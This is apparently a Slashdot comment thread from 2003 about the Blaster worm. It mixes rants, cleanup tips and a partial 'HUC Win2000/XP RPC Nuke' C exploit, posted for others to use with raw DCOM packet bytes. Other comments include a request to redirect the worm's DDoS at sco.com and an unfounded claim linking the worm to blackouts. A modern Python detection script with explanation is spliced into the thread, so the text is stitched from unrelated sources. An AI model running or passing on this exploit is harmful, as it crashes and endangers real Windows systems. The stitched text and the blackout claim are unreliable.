This ain't gonna get better and will probably get worse. Oh, and don't think for a minute that Longhorn, Palladium, and WinFS are going to fix this either. Cut and paste coding is the status quo at M$ and their corporate culture is as much to blame as shoddy product development.
Linux and/or OS X won't bring M$ down, they'll do that all by themselves. Having an alternative will just hasten it in all likelihood.
I'm not saying M$ will drop off the map, but they will lose market share - it's inevitable.
Don't patch anything, no more AOL users online for a bit would be bliss.
insert "me too" comment here --->
/etc/rc.d so I could find those meself.
;) Diablo II and Cossacks and Roller Coaster Tycoon in Linux in Wine, lemme know, otherwise my game machine stays.
Fer once, after that damned other virus that deleted my virus software, I feel safe knowing my OS is safe from this one even though it sucks donkey ballz. Hate it. Where is ps when I need it, and kill, and my
Enough rambling. If anyone can help me play (or can slap me on the head with a didn't ya try it yet
-g
your kernel has already been hacked by your c compiler
Sorry to reply to my own comment but the NANOG archives are always a good place to watch (future and past) 'net wide events.
nice perspective from the trenches.
-g
recompile yet?
it's your ass when you find due to some obscure interaction it's fragged your data...
Would anyone be so kind as to change the DDoS address in the virus code?
Just change windowsupdate.com to sco.com
It's very simple...like this
before: windowsupdate.com/0
after: sco.com/0pdate.com/0
Since this hit yesterday, I've had lots of friends call me up wondering if I can fix their machines.
;-)
Of course, 75 euros if you bring me your machine, 100 euros if I have to visit. So far, 6 people have brought me their machines, the local computer repair shops are charging people something like 199 euros just to slap on a patch and a service pack.
There was a recent thread about what you have on your USB flash key dongles, this is another addition I can carry around and make money off of.
Thank you M$, for making such sucky software
the AC
Hemos is like... sci-fi fans; he thinks technology is cool, but he hasn't bothered to understand the science it's based on.
According to ZoneAlarm, I've had 29640 Intrusions since last night. 21 Critical.
No, it's not the worm, I just forgot to make 192.168.0.2 trusted, that whole client server yokey...
Actually? about two-fitty.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Here's the homepage for Symantec's tool which removes this worm.
Woopty Doo Basil, what does it all mean?!
When you are shown the dialog box informing you of a system shutdown about to occur in 30 seconds or whatnot, run "shutdown /a" in a command line, assuming that you have administrator privileges. If you don't, then log in as Administrator and do it.
At least in the consumer edition of their OSes. There's something to be said about abusing this power for market share, but that's best left to the courts.
I love how MSN Messenger can't be disabled without disabling it in Outlook AND in the app itself, yet autoupdate wants you to configure it before it runs. I'm sure most users go "wha?" and click cancel.
I've posted more about this here for those interested.
1. Disconnect the PC from the network.
2. Remove MSBLAST.exe from the filesystem & registry (see the antivirus producers' pages for exact instructions).
3. Patch the PC.
4. Firewall it in case you didn't patch it right.
5. Save your data at a convenient time (LIKE NOW!).
6. Reinstall Windows because some other virus might be there as well.
Reinstall windows is the "give up" option
Another day another worm.
In case you get hit by this: what our program was doing was creating some classes in one (MTA) thread, using CoMarshalInterThreadInterfaceInStream to ship them over to another (STA) thread that used CoGetInterfaceAndReleaseStream to unwrap them. And suddenly CoGetInterfaceAndReleaseStream was returning null pointers!
So now I've designed a new message into our program to deal with the case when that should-never-be-NULL pointer is NULL: "The DCOM feature of Windows is not working properly. This problem may have been caused by a virus: please check your system". I hope this strikes the right balance between informing and alarming the user...
1. Insert any bootable Linux installation CD. 2. Wait till XP reboots from the worm. 3. Delete the NTFS partition. 4. Install Linux.
Once it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp.
HAHAHA!!! You bought it, you deal with it, suckers!
Healthcare article at Kuro5hin
I've noticed that just recently the media is reporting more detail about computer viruses. In the past, they would just mention that a virus was spreading, maybe how many computers are affected, and that was about it. Now they often report the afflicted operating system, which we all know is almost always Microsoft's demon seed. Maybe the average computer user will learn that Microsoft is totally insecure and cause them to have second thoughts about upgrading to Microsoft's next great OS. But at least the media is no longer hiding this info from the public, who probably thinks that computer viruses spread to all computers equally on the Internet, and don't understand how specific viruses really are 99% of the time.
pot.kettle(black);
I'm sitting here at home typing on my work laptop :-) It's behind a $50 firewall (which may help this worm), but that's all when I'm not VPNed into work. When the laptop's at work it uses Port 135 and the other MS ports so it can mount file servers and printers and such, so it's configured to listen to them, and the LAN at work is configured to pass them. On the other hand, at home, the only things on Port 135 and the other MS ports are viruses and crackers. My corporate IT people could get fancy and set the internal firewalling to only listen to Port 135 from IP address ranges 10.x.x.x or whatever, but basically if I didn't have the firewall or if it let Port 135 traffic go through, my machine would be toast, and I'd bring the nice burnt toast into the office where it would start causing more trouble. It's an ugly set of problems. (Having an operating system with a fundamental clue about security helps a lot, but even there you can get application bugs, like sendmail worms and finger daemon cracks and the like.)
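The worm behaviour quoted in the story summary and discussed in the post above (a shell spawned on port 4444, then the worm fetched by TFTP) gives a defender something concrete to look for in perimeter logs. The following is an added example, not code from this thread or any poster: a small Python script over constructed log lines that flags source hosts whose connections follow that chain. The log format, the host addresses and the 60-second window are assumptions made for the example.

```python
"""Detection sketch for the propagation pattern described in the thread.

Added example, not code from the Slashdot thread or any poster. It looks for
the chain the story summary describes: a connection to the RPC endpoint on
TCP/135, a follow-up connection to the spawned shell on TCP/4444, then the
victim pulling the worm over TFTP (UDP/69) from the attacker. The log format,
field layout and sample addresses below are constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed log format: "<epoch> <src> <dst> <tcp|udp> <dport>" per line,
# one line per accepted connection, as a simple firewall might log it.
LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(tcp|udp)\s+(\d+)$")

# Constructed sample: 10.0.0.5 fully compromises .20 and gets a shell on .31;
# 10.0.0.7 only talks RPC to .20 (ordinary use); 10.0.0.9 is unrelated.
SAMPLE_LOG = """\
1060700000 10.0.0.5 10.0.0.20 tcp 135
1060700001 10.0.0.5 10.0.0.20 tcp 4444
1060700003 10.0.0.20 10.0.0.5 udp 69
1060700010 10.0.0.7 10.0.0.20 tcp 135
1060700020 10.0.0.9 10.0.0.30 tcp 139
1060700030 10.0.0.5 10.0.0.31 tcp 135
1060700031 10.0.0.5 10.0.0.31 tcp 4444
this line is malformed and must be skipped
"""


@dataclass(frozen=True)
class Flow:
    ts: int
    src: str
    dst: str
    proto: str
    dport: int


def parse_log(text: str) -> List[Flow]:
    """Parse the constructed log format, skipping malformed lines."""
    flows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst, proto, dport = m.groups()
            flows.append(Flow(int(ts), src, dst, proto, int(dport)))
    return flows


def find_worm_candidates(flows: List[Flow], window: int = 60) -> Dict[Tuple[str, str], str]:
    """Map (attacker, victim) -> "shell" or "full".

    "shell": TCP/135 then TCP/4444 from the same source to the same host
             within `window` seconds (a spawned shell is being used).
    "full":  additionally, the victim fetched over UDP/69 from the attacker
             within `window` seconds of the shell connection.
    A lone TCP/135 connection is normal RPC traffic and is not reported.
    """
    rpc_seen: Dict[Tuple[str, str], int] = {}    # pair -> first tcp/135 time
    shell_seen: Dict[Tuple[str, str], int] = {}  # pair -> tcp/4444 time
    findings: Dict[Tuple[str, str], str] = {}
    for f in sorted(flows, key=lambda x: x.ts):
        key = (f.src, f.dst)
        if f.proto == "tcp" and f.dport == 135:
            rpc_seen.setdefault(key, f.ts)
        elif f.proto == "tcp" and f.dport == 4444:
            t0 = rpc_seen.get(key)
            if t0 is not None and f.ts - t0 <= window:
                shell_seen[key] = f.ts
                findings.setdefault(key, "shell")
        elif f.proto == "udp" and f.dport == 69:
            # The TFTP request goes victim -> attacker, so the pair is reversed.
            rkey = (f.dst, f.src)
            t1 = shell_seen.get(rkey)
            if t1 is not None and f.ts - t1 <= window:
                findings[rkey] = "full"
    return findings


def victims_per_attacker(findings: Dict[Tuple[str, str], str]) -> Dict[str, int]:
    """Count flagged victims per attacking host, for triage ordering."""
    counts: Dict[str, int] = {}
    for attacker, _victim in findings:
        counts[attacker] = counts.get(attacker, 0) + 1
    return counts


if __name__ == "__main__":
    result = find_worm_candidates(parse_log(SAMPLE_LOG))
    for (attacker, victim), level in sorted(result.items()):
        print(f"{attacker} -> {victim}: {level}")
    print(victims_per_attacker(result))
```

The point of requiring the 135-then-4444 sequence from the same source is that port 135 traffic alone is normal on a LAN where file and printer sharing is in use, as the post above notes; only the follow-up to the shell port and the TFTP fetch distinguish the worm from legitimate RPC.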
Sorry for all the crap. Here is some NukeXP code. Enjoy!!! I've got an mIRC script to run it if you want...

// Http://www.cnhonker.com
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

char sendcode1[] =
"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
"\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
"\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
"\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
"\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";
char sendcode2[] =
"\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";
char sendcode3[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";
char sendcode4[] =
"\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d"
"\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\x50\x10\x01\x00\x00\x00\x02\x00";
char sendcode5[] =
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\x80\xf9\x00\x00\x00\x00\x02\x00";
char sendcode6[] =
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\xb0\xe2\x00\x00\x00\x00\x02\x00";
char sendcode7[] =
"\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"
"\x60\x15\x00\x00\x00\x00\x02\x00";
char sendcode8[] =
"\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *targetip;
    int port, bufsize;
    SOCKET s;
    char buffer[20480];

    printf("= HUC Win2000/XP RPC Nuke V0.10 \r\n");
    printf("= By Lion, Welcome to http://www.cnhonker.com \r\n\n");
    if (argc < 2)
    {
        printf("Usage:\r\n");
        printf(" %s <TargetIP> [TargetPort]\r\n", argv[0]);
        printf("Example:\r\n");
        printf(" %s 192.168.0.1\r\n", argv[0]);
I work at a *very* large real estate information company in southern California, and our FTP servers that pick up all of our offshored work are dead with this virus.
Looks like you all have another reason to recommend to your bosses NOT to outsource...
Well, one thing I've noticed over the last 2 days is that my e-mail inbox contains significantly less SPAM than usual. Maybe some of the servers distributing SPAM got taken down by this. I hope so. But we all know the SPAM distributors won't stay down (unfortunately).
You didn't consider that since the majority of end-users use M$ Windows, most of the virii/worms have been Windows-targeted. The number of Mac/Linux virii/worms is considerably lower. If everyone ran Linux, Lindows, or OSX, you would see a strange increase in the number of holes discovered there as well.
On the other hand, M$ has always had a bad reputation when it comes to security. When they begin to lose market share, they will change their practices - this has already happened once with the dropping of Win9X and the adoption of the NT kernel for the home user.
The biggest problem lies in configuration - most of the great virii (blaster is an exception to this rule) have penetrated M$ systems because of relatively new technologies being shipped and enabled by default with new PCs. Seriously - why did XP Pro originally come with IIS enabled?
This problem will also come to a head as huge disasters begin to occur. Anybody note that the blackouts corresponded with the release of Blaster? Anybody notice how quickly the government rushed out to say it wasn't the worm? Do you actually think they would admit it if it was?
[c0d3fu]: jwjb62@umr.edu || james@macrohub.com